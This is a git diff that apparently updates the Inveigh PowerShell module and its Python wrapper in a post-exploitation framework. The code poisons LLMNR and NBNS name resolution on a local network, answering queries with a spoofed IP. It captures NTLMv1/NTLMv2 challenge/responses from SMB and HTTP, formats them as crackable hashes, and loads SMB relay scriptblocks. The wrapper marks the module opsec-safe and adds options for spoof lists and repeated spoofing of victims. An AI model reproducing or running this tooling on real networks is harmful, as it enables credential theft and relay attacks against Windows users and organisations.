$hash.IP_capture_list += $source_IP - } - } - elseif (($payload_data[(83 + $smb_version_offset)] -eq 3) -and ($payload_data[(84 + $smb_version_offset)..(86 + $smb_version_offset)] -eq 0)) + switch ($destination_port) { - $NTLMv1_offset = $payload_data[(99 + $smb_version_offset)] + (51 + $smb_version_offset) - $NTLMv1_length = DataLength (95 + $smb_version_offset) $payload_data - $NTLMv1_length += $NTLMv1_length - - $NTLMv1_domain_length = DataLength (103 + $smb_version_offset) $payload_data - $NTLMv1_domain_string = DataToString $NTLMv1_domain_length 0 0 ($NTLMv1_string_start + $smb_version_offset) $payload_data - - $NTLMv1_user_length = DataLength (111 + $smb_version_offset) $payload_data - $NTLMv1_user_string = DataToString $NTLMv1_user_length $NTLMv1_domain_length 0 ($NTLMv1_string_start + $smb_version_offset) $payload_data - - $NTLMv1_host_length = DataLength (119 + $smb_version_offset) $payload_data - $NTLMv1_host_string = DataToString $NTLMv1_host_length $NTLMv1_user_length $NTLMv1_domain_length ($NTLMv1_string_start + $smb_version_offset) $payload_data - - $NTLMv1_response = [System.BitConverter]::ToString($payload_data[$NTLMv1_offset..($NTLMv1_offset + $NTLMv1_length - 1)]) -replace "-","" - $NTLMv1_response = $NTLMv1_response.Insert(48,':') - $NTLMv1_hash = $NTLMv1_user_string + "::" + $NTLMv1_domain_string + ":" + $NTLMv1_response + ":" + $NTLM_challenge - - if(($Output -eq 0) -or ($Output -eq 1)) - { - Write-Output "$(Get-Date -format 's') - SMB NTLMv1 challenge/response captured from $source_IP($NTLMv1_host_string):`n$NTLMv1_hash`n" - } - - if(($Output -eq 0) -or ($Output -eq 2)) + 139 { - # write-warning "SMB NTLMv1 challenge/response written to $NTLMv1_out_file" - # $NTLMv1_hash |Out-File $NTLMv1_out_file -Append + if($SMB -eq 'y') + { + SMBNTLMResponse $payload_bytes + } } - - if (($hash.IP_capture_list -notcontains $source_IP) -and (-not $NTLMv1_user_string.EndsWith('$')) -and ($Repeat -eq 'n')) - { - $hash.IP_capture_list += $source_IP + 445 + { + if($SMB -eq 'y') + { + SMBNTLMResponse $payload_bytes + } } } - } - } - 5355 { # LLMNR - $UDP_length[0] += $payload_data.length - 2 - [Byte[]] $LLMNR_response_data = $payload_data[12..$payload_data.length] - $LLMNR_response_data += $LLMNR_response_data - $LLMNR_response_data += (0x00,0x00,0x00,0x1e,0x00,0x04) - $LLMNR_response_data += ([IPAddress][String]([IPAddress]$SpooferIP)).GetAddressBytes() + + # Outgoing packets + switch ($source_port) + { + 139 + { + if($SMB -eq 'y') + { + $NTLM_challenge = SMBNTLMChallenge $payload_bytes + } + } + 445 + { + if($SMB -eq 'y') + { + $NTLM_challenge = SMBNTLMChallenge $payload_bytes + } + } + } + } + 17 + { # UDP + $source_port = $binary_reader.ReadBytes(2) + $endpoint_source_port = DataToUInt16 ($source_port) + $destination_port = DataToUInt16 $binary_reader.ReadBytes(2) + $UDP_length = $binary_reader.ReadBytes(2) + $UDP_length_uint = DataToUInt16 ($UDP_length) + [void]$binary_reader.ReadBytes(2) + $payload_bytes = $binary_reader.ReadBytes(($UDP_length_uint - 2) * 4) + + # Incoming packets + switch ($destination_port) + { + 137 # NBNS + { + if($payload_bytes[5] -eq 1 -and $IP -ne $source_IP) + { + $UDP_length[0] += 16 + + [Byte[]]$NBNS_response_data = $payload_bytes[13..$payload_bytes.length]` + + (0x00,0x00,0x00,0xa5,0x00,0x06,0x00,0x00)` + + ([IPAddress][String]([IPAddress]$SpooferIP)).GetAddressBytes()` + + (0x00,0x00,0x00,0x00) - [Byte[]] $LLMNR_response_packet = (0x14,0xeb) - $LLMNR_response_packet += $source_port[1,0] - $LLMNR_response_packet += $UDP_length[1,0] - $LLMNR_response_packet += (0x00,0x00) - $LLMNR_response_packet += $payload_data[0,1] - $LLMNR_response_packet += (0x80,0x00,0x00,0x01,0x00,0x01,0x00,0x00,0x00,0x00) - $LLMNR_response_packet += $LLMNR_response_data + [Byte[]]$NBNS_response_packet = (0x00,0x89)` + + $source_port[1,0]` + + $UDP_length[1,0]` + + (0x00,0x00)` + + $payload_bytes[0,1]` + + (0x85,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x20)` + + $NBNS_response_data - $send_socket = New-Object Net.Sockets.Socket( [Net.Sockets.AddressFamily]::InterNetwork,[Net.Sockets.SocketType]::Raw,[Net.Sockets.ProtocolType]::Udp ) - $send_socket.SendBufferSize = 1024 - $destination_point = New-Object Net.IPEndpoint( $source_IP, $source_port_2 ) + $send_socket = New-Object Net.Sockets.Socket( [Net.Sockets.AddressFamily]::InterNetwork,[Net.Sockets.SocketType]::Raw,[Net.Sockets.ProtocolType]::Udp ) + $send_socket.SendBufferSize = 1024 + $destination_point = New-Object Net.IPEndpoint($source_IP,$endpoint_source_port) + + $NBNS_query_type = [System.BitConverter]::ToString($payload_bytes[43..44]) + + switch ($NBNS_query_type) + { + '41-41' { + $NBNS_query_type = '00' + } + '41-44' { + $NBNS_query_type = '03' + } + '43-41' { + $NBNS_query_type = '20' + } + '42-4C' { + $NBNS_query_type = '1B' + } + '42-4D' { + $NBNS_query_type = '1C' + } + '42-4E' { + $NBNS_query_type = '1D' + } + '42-4F' { + $NBNS_query_type = '1E' + } + } + + $NBNS_query = [System.BitConverter]::ToString($payload_bytes[13..($payload_bytes.length - 4)]) + $NBNS_query = $NBNS_query -replace "-00","" + $NBNS_query = $NBNS_query.Split("-") | FOREACH{ [CHAR][CONVERT]::toint16($_,16)} + $NBNS_query_string_encoded = New-Object System.String ($NBNS_query,0,$NBNS_query.Length) + $NBNS_query_string_encoded = $NBNS_query_string_encoded.Substring(0,$NBNS_query_string_encoded.IndexOf("CA")) + + $NBNS_query_string_subtracted = "" + $NBNS_query_string = "" + + $n = 0 + + do + { + $NBNS_query_string_sub = (([byte][char]($NBNS_query_string_encoded.Substring($n,1)))-65) + $NBNS_query_string_subtracted += ([convert]::ToString($NBNS_query_string_sub,16)) + $n += 1 + } + until($n -gt ($NBNS_query_string_encoded.Length - 1)) + + $n = 0 + + do + { + $NBNS_query_string += ([char]([convert]::toint16($NBNS_query_string_subtracted.Substring($n,2),16))) + $n += 2 + } + until($n -gt ($NBNS_query_string_subtracted.Length - 1) -or $NBNS_query_string.length -eq 15) + + if($NBNS -eq 'y') + { + if($NBNSTypes -contains $NBNS_query_type) + { + if ((!$Spooflist -or $SpoofList -contains $NBNS_query_string) -and $inveigh.IP_capture_list -notcontains $source_IP) + { + [void]$send_socket.sendTo( $NBNS_response_packet, $destination_point ) + $send_socket.Close() + $NBNS_response_message = "- spoofed response has been sent" + } + else + { + if($SpoofList -notcontains $NBNS_query_string) + { + $NBNS_response_message = "- $NBNS_query_string not on spoof list" + } + else + { + $NBNS_response_message = "- spoof suppressed due to previous capture" + } + } + } + else + { + $NBNS_response_message = "- spoof not sent due to disabled type" + } + } + + $inveigh.console_queue.add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message") + $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message")]) + } + } + 5355 # LLMNR + { + if([System.BitConverter]::ToString($payload_bytes[($payload_bytes.length - 4)..($payload_bytes.length - 3)]) -ne '00-1c') # ignore AAAA for now + { + $UDP_length[0] += $payload_bytes.length - 2 + + [byte[]]$LLMNR_response_data = $payload_bytes[12..$payload_bytes.length] + $LLMNR_response_data += $LLMNR_response_data` + + (0x00,0x00,0x00,0x1e)` + + (0x00,0x04)` + + ([IPAddress][String]([IPAddress]$SpooferIP)).GetAddressBytes() + + [byte[]]$LLMNR_response_packet = (0x14,0xeb)` + + $source_port[1,0]` + + $UDP_length[1,0]` + + (0x00,0x00)` + + $payload_bytes[0,1]` + + (0x80,0x00,0x00,0x01,0x00,0x01,0x00,0x00,0x00,0x00)` + + $LLMNR_response_data + + $send_socket = New-Object Net.Sockets.Socket( [Net.Sockets.AddressFamily]::InterNetwork,[Net.Sockets.SocketType]::Raw,[Net.Sockets.ProtocolType]::Udp ) + $send_socket.SendBufferSize = 1024 + $destination_point = New-Object Net.IPEndpoint($source_IP, $endpoint_source_port) - if($LLMNR -eq 'y') - { - if ($hash.IP_capture_list -notcontains $source_IP) - { - [void]$send_socket.sendTo( $LLMNR_response_packet, $destination_point ) - $send_socket.Close( ) - $LLMNR_response_message = "- spoofed response has been sent" - } - else - { - $LLMNR_response_message = "- spoof suppressed due to previous capture" - } - } + $LLMNR_query = [System.BitConverter]::ToString($payload_bytes[13..($payload_bytes.length - 4)]) + $LLMNR_query = $LLMNR_query -replace "-00","" + $LLMNR_query = $LLMNR_query.Split("-") | FOREACH{ [CHAR][CONVERT]::toint16($_,16)} + $LLMNR_query_string = New-Object System.String ($LLMNR_query,0,$LLMNR_query.Length) - $LLMNR_query = [System.BitConverter]::ToString($payload_data[13..($payload_data.length - 4)]) - $LLMNR_query = $LLMNR_query -replace "-00","" - $LLMNR_query = $LLMNR_query.Split("-") | FOREACH{ [CHAR][CONVERT]::toint16($_,16)} - $LLMNR_query_string = New-Object System.String ($LLMNR_query,0,$LLMNR_query.Length) + if($LLMNR -eq 'y') + { + if((!$Spooflist -or $SpoofList -contains $LLMNR_query_string) -and $inveigh.IP_capture_list -notcontains $source_IP) + { + [void]$send_socket.sendTo( $LLMNR_response_packet, $destination_point ) + $send_socket.Close( ) + $LLMNR_response_message = "- spoofed response has been sent" + } + else + { + if($SpoofList -notcontains $LLMNR_query_string) + { + $LLMNR_response_message = "- $LLMNR_query_string not on spoof list" + } + else + { + $LLMNR_response_message = "- spoof suppressed due to previous capture" + } + } + } - if($Output -eq 0 -or $Output -eq 1) - { - Write-Output "$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message`n" - } - - if($Output -eq 0 -or $Output -eq 2) - { - # "$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message" |Out-File $log_out_file -Append - } - + $inveigh.console_queue.add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message") + $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message")]) + } + } + } + } } - } - - # Outgoing packets - switch ($source_port) - { - 445 { # SMB - if($SMB -eq 'y') + + if($RunTime) + { + if($sniffer_stopwatch.elapsed -ge $sniffer_timeout) { - # SMB versions - if ($payload_data[4] -eq 255) + + if($inveigh.HTTP_listener.IsListening) { - $smb_version_offset = 0 + $inveigh.HTTP_listener.Stop() + $inveigh.HTTP_listener.Close() } - else + + $inveigh.console_queue.add("Inveigh auto-exited at $(Get-Date -format 's')") + $inveigh.log.add("$(Get-Date -format 's') - Inveigh auto-exited") + + if($inveigh.file_output) { - $smb_version_offset = 29 - } - - if (($payload_data[(86 + $smb_version_offset)] -eq 2) -and ($payload_data[(87 + $smb_version_offset)..(89 + $smb_version_offset)] -eq 0)) + "$(Get-Date -format 's') - Inveigh auto-exited"| Out-File $Inveigh.log_out_file -Append + } + + if($inveigh.HTTPS) { - $NTLM_challenge = [System.BitConverter]::ToString($payload_data[(102 + $smb_version_offset)..(109 + $smb_version_offset)]) -replace "-","" + Invoke-Expression -command "netsh http delete sslcert ipport=" > $null + + try + { + $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine") + $certificate_store.Open('ReadWrite') + $certificate = $certificate_store.certificates.find("FindByThumbprint",$inveigh.certificate_thumbprint,$FALSE)[0] + $certificate_store.Remove($certificate) + $certificate_store.Close() + } + catch + { + if($inveigh.status_output) + { + $inveigh.console_queue.add("SSL Certificate Deletion Error - Remove Manually") + } + + $inveigh.log.add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually") + + if($inveigh.file_output) + { + "$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually"| Out-File $Inveigh.log_out_file -Append + } + } } + + $inveigh.HTTP = $false + $inveigh.HTTPS = $false + $inveigh.running = $false + $inveigh.relay_running = $false + } + } + + if($inveigh.file_output) + { + while($inveigh.log_file_queue.Count -gt 0) + { + $inveigh.log_file_queue[0]|Out-File $inveigh.log_out_file -Append + $inveigh.log_file_queue.RemoveRange(0,1) + } + + while($inveigh.NTLMv1_file_queue.Count -gt 0) + { + $inveigh.NTLMv1_file_queue[0]|Out-File $inveigh.NTLMv1_out_file -Append + $inveigh.NTLMv1_file_queue.RemoveRange(0,1) + } + + while($inveigh.NTLMv2_file_queue.Count -gt 0) + { + $inveigh.NTLMv2_file_queue[0]|Out-File $inveigh.NTLMv2_out_file -Append + $inveigh.NTLMv2_file_queue.RemoveRange(0,1) } } } - } - finally + + $binary_reader.Close() + $memory_stream.Dispose() + $memory_stream.Close() + +} + +# End ScriptBlocks +# Begin Startup Functions + +# HTTP/HTTPS Listener Startup Function +Function HTTPListener() +{ + $inveigh.HTTP_listener = New-Object System.Net.HttpListener + + if($inveigh.HTTP) { - if($HTTPS -eq 'y') + $inveigh.HTTP_listener.Prefixes.Add('http://*:80/') + } + + if($inveigh.HTTPS) + { + $inveigh.HTTP_listener.Prefixes.Add('https://*:443/') + } + + $inveigh.HTTP_listener.AuthenticationSchemes = "Anonymous" + $inveigh.HTTP_listener.Start() + $HTTP_runspace = [runspacefactory]::CreateRunspace() + $HTTP_runspace.Open() + $HTTP_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh) + $HTTP_powershell = [powershell]::Create() + $HTTP_powershell.Runspace = $HTTP_runspace + $HTTP_powershell.AddScript($shared_basic_functions_scriptblock) > $null + $HTTP_powershell.AddScript($SMB_relay_challenge_scriptblock) > $null + $HTTP_powershell.AddScript($SMB_relay_response_scriptblock) > $null + $HTTP_powershell.AddScript($SMB_relay_execute_scriptblock) > $null + $HTTP_powershell.AddScript($SMB_NTLM_functions_scriptblock) > $null + $HTTP_powershell.AddScript($HTTP_scriptblock).AddArgument($MachineAccounts).AddArgument($ForceWPADAuth) > $null + $HTTP_handle = $HTTP_powershell.BeginInvoke() +} + +# Sniffer/Spoofer Startup Function +Function SnifferSpoofer() +{ + $sniffer_runspace = [runspacefactory]::CreateRunspace() + $sniffer_runspace.Open() + $sniffer_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh) + $sniffer_powershell = [powershell]::Create() + $sniffer_powershell.Runspace = $sniffer_runspace + $sniffer_powershell.AddScript($shared_basic_functions_scriptblock) > $null + $sniffer_powershell.AddScript($SMB_NTLM_functions_scriptblock) > $null + $sniffer_powershell.AddScript($sniffer_scriptblock).AddArgument($LLMNR_response_message).AddArgument( + $NBNS_response_message).AddArgument($IP).AddArgument($SpooferIP).AddArgument($SMB).AddArgument( + $LLMNR).AddArgument($NBNS).AddArgument($NBNSTypes).AddArgument($SpoofList).AddArgument( + $MachineAccounts).AddArgument($ForceWPADAuth).AddArgument($RunTime) > $null + $sniffer_handle = $sniffer_powershell.BeginInvoke() +} + +# End Startup Functions + +# Startup Enabled Services + +# HTTP Server Start +if(($inveigh.HTTP -or $inveigh.HTTPS) -and $SMBRelay -eq 'n') +{ + HTTPListener +} + +# Sniffer/Spoofer Start - always enabled +SnifferSpoofer + +if($inveigh.console_output) +{ + :console_loop while(($inveigh.running) -and ($inveigh.console_output)) + { + while($inveigh.console_queue.Count -gt 0) { - Invoke-Expression -command "netsh http delete sslcert ipport=" > $null - - try + if($inveigh.output_stream_only) { - $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine") - $certificate_store.Open('ReadWrite') - $certificate = $certificate_store.certificates.find("FindByThumbprint",$certificate_thumbprint,$FALSE)[0] - $certificate_store.Remove($certificate) - $certificate_store.Close() + write-output($inveigh.console_queue[0] + $inveigh.newline) + $inveigh.console_queue.RemoveRange(0,1) } - catch + else { - # write-warning 'SSL Certificate Deletion Error - Remove Manually' + switch -wildcard ($inveigh.console_queue[0]) + { + "*local administrator*" + { + write-warning $inveigh.console_queue[0] + $inveigh.console_queue.RemoveRange(0,1) + } + "*NTLMv1 challenge/response written*" + { + if($inveigh.file_output) + { + write-warning $inveigh.console_queue[0] + } + $inveigh.console_queue.RemoveRange(0,1) + } + "*NTLMv2 challenge/response written*" + { + if($inveigh.file_output) + { + write-warning $inveigh.console_queue[0] + } + $inveigh.console_queue.RemoveRange(0,1) + } + "* relay *" + { + write-warning $inveigh.console_queue[0] + $inveigh.console_queue.RemoveRange(0,1) + } + "Service *" + { + write-warning $inveigh.console_queue[0] + $inveigh.console_queue.RemoveRange(0,1) + } + default + { + write-output $inveigh.console_queue[0] + $inveigh.console_queue.RemoveRange(0,1) + } + } + } + } + + if($inveigh.console_input) + { + if([console]::KeyAvailable) + { + $inveigh.console_output = $false + BREAK console_loop } } - - # write-warning "Inveigh exited at $(Get-Date -format 's')" - - if(($Output -eq 0) -or ($Output -eq 2)) - { - # "Inveigh exited at $(Get-Date -format 's')" | Out-File $log_out_file -Append - } - - try - { - $HTTP_listener_stop = $web_request.GetResponse() - $listener.Close() - $listener.Stop() - $binary_reader.Close() - $memory_stream.Close() - $sniffer_socket.Close() - } - catch {} + + Start-Sleep -m 5 } } + +} diff --git a/lib/modules/collection/inveigh.py b/lib/modules/collection/inveigh.py index 8c88873..b4f91b9 100644 --- a/lib/modules/collection/inveigh.py +++ b/lib/modules/collection/inveigh.py @@ -19,7 +19,7 @@ class Module: 'NeedsAdmin' : True, - 'OpsecSafe' : False, + 'OpsecSafe' : True, 'MinPSVersion' : '2', @@ -38,17 +38,17 @@ class Module: 'Value' : '' }, 'IP' : { - 'Description' : 'A specific local IP address for listening. ', + 'Description' : 'Specific local IP address for listening.', 'Required' : False, 'Value' : '' }, 'SpooferIP' : { - 'Description' : 'Specify an IP address for LLMNR/NBNS spoofing.', + 'Description' : 'Specific IP address for LLMNR/NBNS spoofing.', 'Required' : False, 'Value' : '' }, - 'HTTP' : { - 'Description' : 'Enable/Disable HTTP challenge/response capture (Y/N).', + 'LLMNR' : { + 'Description' : 'Enable/Disable LLMNR spoofing (Y/N).', 'Required' : False, 'Value' : 'Y' }, @@ -57,25 +57,50 @@ class Module: 'Required' : False, 'Value' : 'Y' }, + 'NBNSTypes' : { + 'Description' : 'Comma separated list of NBNS types to spoof.', + 'Required' : False, + 'Value' : '00,20' + }, + 'Repeat' : { + 'Description' : 'Enable/Disable repeated LLMNR/NBNS spoofs to a victim system after one user challenge/response has been captured (Y/N).', + 'Required' : False, + 'Value' : 'Y' + }, + 'SpoofList' : { + 'Description' : 'Comma separated list of hostnames to spoof with LLMNR and NBNS.', + 'Required' : False, + 'Value' : '' + }, + 'HTTP' : { + 'Description' : 'Enable/Disable HTTP challenge/response capture (Y/N).', + 'Required' : False, + 'Value' : 'Y' + }, 'SMB' : { 'Description' : 'Enable/Disable SMB challenge/response capture (Y/N).', 'Required' : False, 'Value' : 'Y' }, - 'LLMNR' : { - 'Description' : 'Enable/Disable LLMNR spoofing (Y/N).', + 'Challenge' : { + 'Description' : 'Specific 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random challenge will be generated for each request.', 'Required' : False, - 'Value' : 'Y' + 'Value' : '' }, - 'Repeat' : { - 'Description' : 'Enable/Disable repeated LLMNR/NBNS spoofs to a victim system after one user challenge/response has been captured (Y/N).', + 'MachineAccounts' : { + 'Description' : 'Enable/Disable showing NTLM challenge/response captures from machine accounts (Y/N).', 'Required' : False, - 'Value' : 'Y' + 'Value' : 'N' }, 'ForceWPADAuth' : { 'Description' : 'Enable/Disable LLMNR spoofing (Y/N).', 'Required' : False, 'Value' : 'Y' + }, + 'RunTime' : { + 'Description' : 'Run time duration in minutes.', + 'Required' : False, + 'Value' : '' } } @@ -107,13 +132,11 @@ class Module: script = moduleCode # disable file output - script += "\n" + 'Invoke-Inveigh -Output 1 ' + script += "\n" + 'Invoke-Inveigh -ConsoleOutput y -Tool 2 ' for option,values in self.options.iteritems(): if option.lower() != "agent": - if option.lower() == "nbns" and values['Value'].lower() == 'y': - script += ' -NBNS Y -NBNSTypes @("00","20")' - elif values['Value'] and values['Value'] != '': + if values['Value'] and values['Value'] != '': if values['Value'].lower() == "true": # if we're just adding a switch script += " -" + str(option)